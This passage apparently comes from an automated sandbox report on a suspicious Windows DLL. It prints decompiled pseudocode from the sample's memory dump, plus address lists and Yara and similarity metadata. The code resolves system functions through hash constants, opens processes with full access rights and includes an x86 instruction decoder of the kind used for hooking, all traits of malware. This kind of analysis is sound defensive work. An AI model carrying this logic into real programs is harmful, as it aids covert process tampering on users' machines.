                                                                                                        					if( *( *(_t449 + 4)) <= 0) {
                                                                                                        						L21:
                                                                                                        						__eflags =  *(_t449 + 0x20);
                                                                                                        						if( *(_t449 + 0x20) <= 0) {
                                                                                                        							L33:
                                                                                                        							E6E47F654(_t449 + 0x24);
                                                                                                        							_t173 =  *(_t449 + 4);
                                                                                                        							__eflags = _t173[0xb];
                                                                                                        							if(_t173[0xb] == 0) {
                                                                                                        								L46:
                                                                                                        								 *((intOrPtr*)(_t449 + 8)) = 0;
                                                                                                        								 *((intOrPtr*)(_t449 + 0xc)) = 0;
                                                                                                        								E6E47F584(_t449 + 0x14, 0);
                                                                                                        								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
                                                                                                        								 *((intOrPtr*)(_t449 + 0x38)) = 0;
                                                                                                        								E6E47F584(_t449 + 0x40, 0);
                                                                                                        								_t178 =  *(_t449 + 4);
                                                                                                        								_t414 = 0x40;
                                                                                                        								__eflags = _t178[6] - 0x40;
                                                                                                        								_t415 =  <  ? _t178[6] : _t414;
                                                                                                        								 *(_t449 + 0x80) = _t415;
                                                                                                        								__eflags = _t415;
                                                                                                        								if(_t415 <= 0) {
                                                                                                        									L57:
                                                                                                        									_t413 = E6E47F4BC(_t449 + 0x14, 0);
                                                                                                        									_t180 = E6E482908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
                                                                                                        									_t132 = _t180 - 0x80; // -128
                                                                                                        									_t181 = _t132;
                                                                                                        									__eflags = _t181 - 0x3f;
                                                                                                        									_t315 =  <=  ? _t181 : _t180;
                                                                                                        									__eflags = _t315 - 0x102;
                                                                                                        									if(_t315 == 0x102) {
                                                                                                        										L59:
                                                                                                        										E6E47B5C4(_t449 + 0x34);
                                                                                                        										E6E47B5C4(_t449 + 8);
                                                                                                        										goto L60;
                                                                                                        									}
                                                                                                        									__eflags = _t315 - 0x3f;
                                                                                                        									if(_t315 <= 0x3f) {
                                                                                                        										__eflags = _t315 << 2;
                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E47F4BC( *(_t449 + 4), _t315 << 2)));
                                                                                                        										_t188 = E6E47F4BC( *(_t449 + 0x7c), _t315 << 2);
                                                                                                        										_t413 =  *(_t449 + 4);
                                                                                                        										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
                                                                                                        										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
                                                                                                        										E6E47B5C4(_t449 + 0x34);
                                                                                                        										E6E47B5C4(_t449 + 8);
                                                                                                        										goto L62;
                                                                                                        									}
                                                                                                        									goto L59;
                                                                                                        								}
                                                                                                        								_t446 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        								while(1) {
                                                                                                        									E6E47CA8C(_t449 + 0x4c);
                                                                                                        									_t413 = 0;
                                                                                                        									_t343 = _t449 + 0x4c;
                                                                                                        									 *((char*)(_t343 + 4)) = 0;
                                                                                                        									 *((intOrPtr*)(_t343 + 0x20)) = 0;
                                                                                                        									__eflags = E6E47C280(_t343);
                                                                                                        									if(__eflags != 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									E6E47F828(_t449 + 0x14, E6E47F4CC(_t449 + 0x10) + 4);
                                                                                                        									 *((intOrPtr*)(E6E47F4BC(_t449 + 0x14, E6E47F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
                                                                                                        									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
                                                                                                        									_t202 = E6E483064(0x60a28c5c, 0x3659ae1e);
                                                                                                        									__eflags = _t202;
                                                                                                        									if(_t202 == 0) {
                                                                                                        										L51:
                                                                                                        										_t413 =  *(_t449 + 0x6c);
                                                                                                        										__eflags = _t413;
                                                                                                        										if(__eflags == 0) {
                                                                                                        											break;
                                                                                                        										}
                                                                                                        										__eflags = _t413 - 0xffffffff;
                                                                                                        										if(__eflags != 0) {
                                                                                                        											E6E47F828(_t449 + 0x40, E6E47F4CC(_t449 + 0x3c) + 4);
                                                                                                        											 *(E6E47F4BC(_t449 + 0x40, E6E47F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
                                                                                                        											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
                                                                                                        											E6E47CD24(_t449 + 0x4c, __eflags);
                                                                                                        											_t446 = _t446 + 1;
                                                                                                        											__eflags = _t446 -  *(_t449 + 0x80);
                                                                                                        											if(_t446 <  *(_t449 + 0x80)) {
                                                                                                        												continue;
                                                                                                        											}
                                                                                                        											_t431 = 0;
                                                                                                        											__eflags = 0;
                                                                                                        											do {
                                                                                                        												_t211 = E6E47F4BC( *(_t449 + 4), _t431 * 4);
                                                                                                        												_t212 = E6E47F4BC(_t449 + 0x40, _t431 * 4);
                                                                                                        												E6E478B58( *_t211, E6E4802B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
                                                                                                        												_t431 = _t431 + 1;
                                                                                                        												__eflags = _t431 -  *(_t449 + 0x80);
                                                                                                        											} while (_t431 <  *(_t449 + 0x80));
                                                                                                        											goto L57;
                                                                                                        										}
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t413 = 0;
                                                                                                        									_push(2);
                                                                                                        									_push(0);
                                                                                                        									_push(0);
                                                                                                        									_push(_t449 + 0x6c);
                                                                                                        									_push( *((intOrPtr*)(_t449 + 0x78)));
                                                                                                        									_push( *((intOrPtr*)(_t449 + 0x60)));
                                                                                                        									_push(0xffffffff);
                                                                                                        									asm("int3");
                                                                                                        									asm("int3");
                                                                                                        									__eflags = _t202;
                                                                                                        									if(__eflags != 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									goto L51;
                                                                                                        								}
                                                                                                        								E6E47CD24(_t449 + 0x4c, __eflags);
                                                                                                        								goto L59;
                                                                                                        							}
                                                                                                        							_t427 =  *_t173;
                                                                                                        							__eflags = _t427;
                                                                                                        							if(_t427 <= 0) {
                                                                                                        								goto L46;
                                                                                                        							}
                                                                                                        							_t430 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							_t322 =  &(_t173[1]);
                                                                                                        							while(1) {
                                                                                                        								_t433 = _t430 * 4;
                                                                                                        								_t217 = E6E47F4BC(_t322, _t433);
                                                                                                        								_t218 =  *(_t449 + 4);
                                                                                                        								__eflags =  *_t217 - _t218[0xc];
                                                                                                        								if( *_t217 == _t218[0xc]) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t430 = _t430 + 1;
                                                                                                        								__eflags = _t430 - _t427;
                                                                                                        								if(_t430 < _t427) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L46;
                                                                                                        							}
                                                                                                        							__eflags = _t430 - 0xffffffff;
                                                                                                        							if(_t430 != 0xffffffff) {
                                                                                                        								_t219 = E6E47F4CC( *_t449);
                                                                                                        								__eflags = _t219 - _t433;
                                                                                                        								if(_t219 > _t433) {
                                                                                                        									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
                                                                                                        									_t247 = E6E47F4CC( *_t449);
                                                                                                        									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
                                                                                                        									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
                                                                                                        										 *((intOrPtr*)(_t449 + 0x90)) = E6E47F4BC( *(_t449 + 4), _t433);
                                                                                                        										 *((intOrPtr*)(_t449 + 0x8c)) = E6E47F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
                                                                                                        										E6E4838F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E47F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
                                                                                                        										_t449 = _t449 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc);
                                                                                                        									_t421 =  *(_t449 + 4);
                                                                                                        									_t75 =  &(_t421[6]);
                                                                                                        									 *_t75 = _t421[6] - 1;
                                                                                                        									__eflags =  *_t75;
                                                                                                        								}
                                                                                                        								_t220 = E6E47F4CC(_t322);
                                                                                                        								__eflags = _t220 - _t433;
                                                                                                        								if(_t220 > _t433) {
                                                                                                        									_t430 = 4 + _t430 * 4;
                                                                                                        									_t237 = E6E47F4CC(_t322);
                                                                                                        									__eflags = _t237 - _t430;
                                                                                                        									if(_t237 > _t430) {
                                                                                                        										_t238 = E6E47F4BC(_t322, _t433);
                                                                                                        										 *((intOrPtr*)(_t449 + 0x94)) = E6E47F4BC(_t322, _t430);
                                                                                                        										E6E4838F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E47F4CC(_t322) - _t430);
                                                                                                        										_t449 = _t449 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828(_t322, E6E47F4CC(_t322) + 0xfffffffc);
                                                                                                        									_t246 =  *(_t449 + 4);
                                                                                                        									 *_t246 =  *_t246 - 1;
                                                                                                        									__eflags =  *_t246;
                                                                                                        								}
                                                                                                        								E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 4);
                                                                                                        								 *(E6E47F4BC( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
                                                                                                        								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
                                                                                                        								E6E47F828(_t322, E6E47F4CC(_t322) + 4);
                                                                                                        								 *(E6E47F4BC(_t322, E6E47F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
                                                                                                        								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
                                                                                                        							}
                                                                                                        							goto L46;
                                                                                                        						}
                                                                                                        						_t323 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						do {
                                                                                                        							 *(_t449 + 0x7c) = _t323 * 4;
                                                                                                        							_t428 = E6E47F4BC(_t449 + 0x28, _t323 * 4);
                                                                                                        							_t258 =  *(_t449 + 4);
                                                                                                        							_t430 =  *_t258;
                                                                                                        							__eflags = _t430;
                                                                                                        							if(_t430 <= 0) {
                                                                                                        								L29:
                                                                                                        								_t437 = E6E483064(0x8e844d1e, 0x5c3654e3);
                                                                                                        								__eflags = _t437;
                                                                                                        								if(_t437 != 0) {
                                                                                                        									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E47F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
                                                                                                        									__eflags = _t439;
                                                                                                        									if(_t439 != 0) {
                                                                                                        										E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 4);
                                                                                                        										 *(E6E47F4BC( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc)) = _t439;
                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
                                                                                                        										_t269 = E6E47F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
                                                                                                        										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
                                                                                                        										E6E47F828( *((intOrPtr*)(_t449 + 0x74)), E6E47F4CC( &(( *(_t449 + 4))[1])) + 4);
                                                                                                        										 *((intOrPtr*)(E6E47F4BC( *((intOrPtr*)(_t449 + 0x74)), E6E47F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
                                                                                                        										_t277 =  *(_t449 + 4);
                                                                                                        										 *_t277 =  *_t277 + 1;
                                                                                                        										__eflags =  *_t277;
                                                                                                        									}
                                                                                                        								}
                                                                                                        								goto L32;
                                                                                                        							}
                                                                                                        							_t438 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							 *(_t449 + 0x88) =  &(_t258[1]);
                                                                                                        							while(1) {
                                                                                                        								_t279 = E6E47F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
                                                                                                        								__eflags =  *_t279 -  *_t428;
                                                                                                        								if( *_t279 ==  *_t428) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t438 = _t438 + 1;
                                                                                                        								__eflags = _t438 - _t430;
                                                                                                        								if(_t438 < _t430) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L29;
                                                                                                        							}
                                                                                                        							__eflags = _t438 - 0xffffffff;
                                                                                                        							if(_t438 == 0xffffffff) {
                                                                                                        								goto L29;
                                                                                                        							}
                                                                                                        							L32:
                                                                                                        							_t323 = _t323 + 1;
                                                                                                        							__eflags = _t323 -  *(_t449 + 0x20);
                                                                                                        						} while (_t323 <  *(_t449 + 0x20));
                                                                                                        						goto L33;
                                                                                                        					} else {
                                                                                                        						_t324 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						do {
                                                                                                        							 *(_t449 + 0x64) = _t324 * 4;
                                                                                                        							_t429 = E6E47F4BC( *(_t449 + 0x7c), _t324 * 4);
                                                                                                        							_t430 =  *(_t449 + 0x20);
                                                                                                        							__eflags = _t430;
                                                                                                        							if(_t430 <= 0) {
                                                                                                        								L11:
                                                                                                        								_t430 =  &(( *(_t449 + 4))[1]);
                                                                                                        								_t283 = E6E47F4CC( &(( *(_t449 + 4))[1]));
                                                                                                        								__eflags = _t283 -  *(_t449 + 0x64);
                                                                                                        								if(_t283 >  *(_t449 + 0x64)) {
                                                                                                        									_t443 = 4 + _t324 * 4;
                                                                                                        									_t299 = E6E47F4CC(_t430);
                                                                                                        									__eflags = _t299 - _t443;
                                                                                                        									if(_t299 > _t443) {
                                                                                                        										 *((intOrPtr*)(_t449 + 0x9c)) = E6E47F4BC(_t430,  *(_t449 + 0x64));
                                                                                                        										 *((intOrPtr*)(_t449 + 0x98)) = E6E47F4BC(_t430, _t443);
                                                                                                        										E6E4838F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E47F4CC(_t430) - _t443);
                                                                                                        										_t449 = _t449 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828(_t430, E6E47F4CC(_t430) + 0xfffffffc);
                                                                                                        									_t308 =  *(_t449 + 4);
                                                                                                        									 *_t308 =  *_t308 - 1;
                                                                                                        									__eflags =  *_t308;
                                                                                                        								}
                                                                                                        								_t442 = E6E483064(0x60a28c5c, 0xe96b154c);
                                                                                                        								__eflags = _t442;
                                                                                                        								if(_t442 != 0) {
                                                                                                        									 *_t442( *(E6E47F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
                                                                                                        								}
                                                                                                        								_t285 = E6E47F4CC( *_t449);
                                                                                                        								__eflags = _t285 -  *(_t449 + 0x64);
                                                                                                        								if(_t285 >  *(_t449 + 0x64)) {
                                                                                                        									_t445 = 4 + _t324 * 4;
                                                                                                        									_t287 = E6E47F4CC( *_t449);
                                                                                                        									__eflags = _t287 - _t445;
                                                                                                        									if(_t287 > _t445) {
                                                                                                        										_t430 = E6E47F4BC( *(_t449 + 4),  *(_t449 + 0x64));
                                                                                                        										 *((intOrPtr*)(_t449 + 0xa0)) = E6E47F4BC( *(_t449 + 4), _t445);
                                                                                                        										E6E4838F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E47F4CC( *_t449) - _t445);
                                                                                                        										_t449 = _t449 + 0xc;
                                                                                                        									}
                                                                                                        									E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc);
                                                                                                        									_t296 =  *(_t449 + 4);
                                                                                                        									_t33 =  &(_t296[6]);
                                                                                                        									 *_t33 = _t296[6] - 1;
                                                                                                        									__eflags =  *_t33;
                                                                                                        								}
                                                                                                        								_t324 = _t324 - 1;
                                                                                                        								__eflags = _t324;
                                                                                                        								goto L20;
                                                                                                        							}
                                                                                                        							_t444 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							while(1) {
                                                                                                        								_t310 = E6E47F4BC(_t449 + 0x28, _t444 * 4);
                                                                                                        								__eflags =  *_t310 -  *_t429;
                                                                                                        								if( *_t310 ==  *_t429) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t444 = _t444 + 1;
                                                                                                        								__eflags = _t444 - _t430;
                                                                                                        								if(_t444 < _t430) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							__eflags = _t444 - 0xffffffff;
                                                                                                        							if(_t444 == 0xffffffff) {
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							L20:
                                                                                                        							_t324 = _t324 + 1;
                                                                                                        							__eflags = _t324 -  *( *(_t449 + 4));
                                                                                                        						} while (_t324 <  *( *(_t449 + 4)));
                                                                                                        						goto L21;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}























































                                                                                                        0x6e478754
                                                                                                        0x6e478754
                                                                                                        0x6e478754
                                                                                                        0x6e478759
                                                                                                        0x6e47875e
                                                                                                        0x6e478760
                                                                                                        0x6e478764
                                                                                                        0x6e47876b
                                                                                                        0x6e478770
                                                                                                        0x6e478772
                                                                                                        0x6e478ad3
                                                                                                        0x6e478ae2
                                                                                                        0x6e478afb
                                                                                                        0x6e478b00
                                                                                                        0x6e478b00
                                                                                                        0x6e478785
                                                                                                        0x6e47878a
                                                                                                        0x6e47878e
                                                                                                        0x6e47878e
                                                                                                        0x6e47878e
                                                                                                        0x6e4787a0
                                                                                                        0x6e4787c1
                                                                                                        0x6e4787c9
                                                                                                        0x6e4787d7
                                                                                                        0x6e4787f5
                                                                                                        0x6e4787fb
                                                                                                        0x6e4787fb
                                                                                                        0x00000000
                                                                                                        0x6e47870c
                                                                                                        0x6e4785a4
                                                                                                        0x6e4785a4
                                                                                                        0x6e4785a6
                                                                                                        0x6e4785ad
                                                                                                        0x6e4785bb
                                                                                                        0x6e4785bd
                                                                                                        0x6e4785c1
                                                                                                        0x6e4785c3
                                                                                                        0x6e4785c5
                                                                                                        0x6e478600
                                                                                                        0x6e47860f
                                                                                                        0x6e478611
                                                                                                        0x6e478613
                                                                                                        0x6e478631
                                                                                                        0x6e478633
                                                                                                        0x6e478635
                                                                                                        0x6e478647
                                                                                                        0x6e478665
                                                                                                        0x6e47866e
                                                                                                        0x6e478671
                                                                                                        0x6e47867f
                                                                                                        0x6e478690
                                                                                                        0x6e4786ae
                                                                                                        0x6e4786b0
                                                                                                        0x6e4786b4
                                                                                                        0x6e4786b4
                                                                                                        0x6e4786b4
                                                                                                        0x6e478635
                                                                                                        0x00000000
                                                                                                        0x6e478613
                                                                                                        0x6e4785cb
                                                                                                        0x6e4785cb
                                                                                                        0x6e4785d0
                                                                                                        0x6e4785d7
                                                                                                        0x6e4785e6
                                                                                                        0x6e4785ed
                                                                                                        0x6e4785ef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4785fb
                                                                                                        0x6e4785fc
                                                                                                        0x6e4785fe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4785fe
                                                                                                        0x6e4785f1
                                                                                                        0x6e4785f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4786b6
                                                                                                        0x6e4786b6
                                                                                                        0x6e4786b7
                                                                                                        0x6e4786b7
                                                                                                        0x00000000
                                                                                                        0x6e478497
                                                                                                        0x6e478497
                                                                                                        0x6e478497
                                                                                                        0x6e478499
                                                                                                        0x6e4784a0
                                                                                                        0x6e4784ae
                                                                                                        0x6e4784b0
                                                                                                        0x6e4784b4
                                                                                                        0x6e4784b6
                                                                                                        0x6e4784e2
                                                                                                        0x6e4784e6
                                                                                                        0x6e4784eb
                                                                                                        0x6e4784f0
                                                                                                        0x6e4784f4
                                                                                                        0x6e4784f8
                                                                                                        0x6e4784ff
                                                                                                        0x6e478504
                                                                                                        0x6e478506
                                                                                                        0x6e478a95
                                                                                                        0x6e478aa4
                                                                                                        0x6e478ac3
                                                                                                        0x6e478ac8
                                                                                                        0x6e478ac8
                                                                                                        0x6e478519
                                                                                                        0x6e47851e
                                                                                                        0x6e478522
                                                                                                        0x6e478522
                                                                                                        0x6e478522
                                                                                                        0x6e478533
                                                                                                        0x6e478535
                                                                                                        0x6e478537
                                                                                                        0x6e478548
                                                                                                        0x6e478548
                                                                                                        0x6e47854d
                                                                                                        0x6e478552
                                                                                                        0x6e478556
                                                                                                        0x6e47855b
                                                                                                        0x6e478562
                                                                                                        0x6e478567
                                                                                                        0x6e478569
                                                                                                        0x6e478a57
                                                                                                        0x6e478a63
                                                                                                        0x6e478a7d
                                                                                                        0x6e478a82
                                                                                                        0x6e478a82
                                                                                                        0x6e47857f
                                                                                                        0x6e478584
                                                                                                        0x6e478588
                                                                                                        0x6e478588
                                                                                                        0x6e478588
                                                                                                        0x6e478588
                                                                                                        0x6e47858b
                                                                                                        0x6e47858b
                                                                                                        0x00000000
                                                                                                        0x6e47858b
                                                                                                        0x6e4784ba
                                                                                                        0x6e4784ba
                                                                                                        0x6e4784bc
                                                                                                        0x6e4784c8
                                                                                                        0x6e4784cf
                                                                                                        0x6e4784d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4784dd
                                                                                                        0x6e4784de
                                                                                                        0x6e4784e0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4784e0
                                                                                                        0x6e4784d3
                                                                                                        0x6e4784d6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47858c
                                                                                                        0x6e478590
                                                                                                        0x6e478591
                                                                                                        0x6e478591
                                                                                                        0x00000000
                                                                                                        0x6e478499
                                                                                                        0x6e478491

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                        • Instruction ID: 133c6519ca95d1d1631e1515d08f0516113689ead07eccfcc2a827c340c729c2
                                                                                                        • Opcode Fuzzy Hash: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                        • Instruction Fuzzy Hash: 07124D715092059FCB34DFB5C980EEE77E9AF94204F104E2EE599972A1EB309C45CBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 99%
                                                                                                        			E6E489370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                        				signed int _t250;
                                                                                                        				signed char _t251;
                                                                                                        				signed char* _t254;
                                                                                                        				char _t255;
                                                                                                        				signed short _t256;
                                                                                                        				char _t257;
                                                                                                        				signed short _t260;
                                                                                                        				signed int _t261;
                                                                                                        				signed int _t262;
                                                                                                        				void* _t264;
                                                                                                        				void* _t272;
                                                                                                        				void* _t273;
                                                                                                        				signed short* _t274;
                                                                                                        				signed char _t275;
                                                                                                        				signed int _t277;
                                                                                                        				signed int _t278;
                                                                                                        				void* _t282;
                                                                                                        				signed int _t288;
                                                                                                        				unsigned int _t290;
                                                                                                        				signed int _t292;
                                                                                                        				signed int _t293;
                                                                                                        				signed int _t294;
                                                                                                        				signed int _t295;
                                                                                                        				unsigned int _t296;
                                                                                                        				unsigned int _t297;
                                                                                                        				signed int _t299;
                                                                                                        				unsigned int _t301;
                                                                                                        				signed char _t302;
                                                                                                        				signed int _t304;
                                                                                                        				signed char _t307;
                                                                                                        				signed char _t308;
                                                                                                        				signed int _t309;
                                                                                                        				void* _t312;
                                                                                                        				void* _t313;
                                                                                                        				signed int _t314;
                                                                                                        				signed int _t316;
                                                                                                        				signed int _t319;
                                                                                                        				signed int _t321;
                                                                                                        				signed int _t338;
                                                                                                        				signed int _t339;
                                                                                                        				signed int _t343;
                                                                                                        				signed int _t345;
                                                                                                        				unsigned int* _t346;
                                                                                                        				unsigned int _t354;
                                                                                                        				signed int _t355;
                                                                                                        				void* _t357;
                                                                                                        				signed int _t364;
                                                                                                        				signed int _t366;
                                                                                                        				signed int _t383;
                                                                                                        				signed int _t388;
                                                                                                        				signed int _t391;
                                                                                                        				signed int _t395;
                                                                                                        				signed int _t396;
                                                                                                        				signed int _t397;
                                                                                                        				signed int _t398;
                                                                                                        				signed int _t399;
                                                                                                        				signed int _t400;
                                                                                                        				signed int _t403;
                                                                                                        				signed int _t408;
                                                                                                        				signed int _t411;
                                                                                                        				signed int _t412;
                                                                                                        				signed int _t413;
                                                                                                        				signed int _t417;
                                                                                                        				signed int _t419;
                                                                                                        				signed int _t424;
                                                                                                        				void* _t426;
                                                                                                        				signed int* _t427;
                                                                                                        
                                                                                                        				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
                                                                                                        				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
                                                                                                        				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
                                                                                                        				_t274 =  *(_t426 + 0x48);
                                                                                                        				E6E483698( *(_t426 + 0x48), 0, 0x1c);
                                                                                                        				_t427 = _t426 + 0xc;
                                                                                                        				_t338 = 0;
                                                                                                        				_t282 = 0x10;
                                                                                                        				do {
                                                                                                        					_t250 =  *_t274 & 0x000000ff;
                                                                                                        					_t274 =  &(_t274[0]);
                                                                                                        					if(_t250 == 0xf3) {
                                                                                                        						_t383 = _t427[0x10];
                                                                                                        						_t339 = _t338 | 0x00000004;
                                                                                                        						L18:
                                                                                                        						_t338 = _t339 & 0x000000ff;
                                                                                                        						 *(_t383 + 1) = _t250;
                                                                                                        						goto L19;
                                                                                                        					}
                                                                                                        					if(_t250 == 0xf2) {
                                                                                                        						_t383 = _t427[0x10];
                                                                                                        						_t339 = _t338 | 0x00000002;
                                                                                                        						goto L18;
                                                                                                        					}
                                                                                                        					if(_t250 == 0xf0) {
                                                                                                        						_t338 = (_t338 | 0x00000020) & 0x000000ff;
                                                                                                        						 *(_t427[0x10] + 2) = _t250;
                                                                                                        						goto L19;
                                                                                                        					}
                                                                                                        					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
                                                                                                        						L14:
                                                                                                        						_t338 = (_t338 | 0x00000040) & 0x000000ff;
                                                                                                        						 *(_t427[0x10] + 3) = _t250;
                                                                                                        					} else {
                                                                                                        						_t6 = _t250 - 0x64; // -100
                                                                                                        						if(_t6 <= 1) {
                                                                                                        							goto L14;
                                                                                                        						}
                                                                                                        						if (_t250 == 0x66) goto L13;
                                                                                                        						asm("adc [ebx+0x587567f8], eax");
                                                                                                        					}
                                                                                                        					L19:
                                                                                                        					_t282 = _t282 + 0xff;
                                                                                                        				} while (_t282 != 0);
                                                                                                        				_t388 = _t427[0x10];
                                                                                                        				_t285 =  !=  ? _t338 : 1;
                                                                                                        				_t343 = _t338 << 0x17;
                                                                                                        				 *(_t388 + 6) = _t250;
                                                                                                        				 *_t427 =  !=  ? _t338 : 1;
                                                                                                        				 *(_t388 + 0x18) = _t343;
                                                                                                        				if(_t250 == 0xf) {
                                                                                                        					_t250 =  *_t274 & 0x000000ff;
                                                                                                        					_t274 =  &(_t274[0]);
                                                                                                        					_t427[5] = _t250;
                                                                                                        					 *(_t427[0x10] + 7) = _t250;
                                                                                                        					_t427[2] = _t427[4] + 0x4a;
                                                                                                        				} else {
                                                                                                        					_t22 = _t250 - 0xa0; // -160
                                                                                                        					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
                                                                                                        					if(_t22 <= 3) {
                                                                                                        						_t424 =  *_t427;
                                                                                                        						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
                                                                                                        						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t354 = _t250 >> 2;
                                                                                                        				_t391 = _t250 & 0x00000003;
                                                                                                        				_t345 = _t427[2];
                                                                                                        				_t427[3] = _t391;
                                                                                                        				_t427[6] = _t354;
                                                                                                        				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
                                                                                                        				_t427[1] = _t288;
                                                                                                        				if(_t288 == 0xff) {
                                                                                                        					_t343 = _t343 + 0x3000;
                                                                                                        					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
                                                                                                        					 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        					_t427[1] = _t288;
                                                                                                        				}
                                                                                                        				if((_t427[1] & 0x00000080) != 0) {
                                                                                                        					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
                                                                                                        					_t427[1] = _t290;
                                                                                                        					_t395 = _t290 >> 8;
                                                                                                        				} else {
                                                                                                        					_t395 = 0;
                                                                                                        				}
                                                                                                        				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
                                                                                                        					_t343 = _t343 | 0x00003000;
                                                                                                        					 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        				}
                                                                                                        				if((_t427[1] & 0x00000001) == 0) {
                                                                                                        					if(( *_t427 & 0x00000020) != 0) {
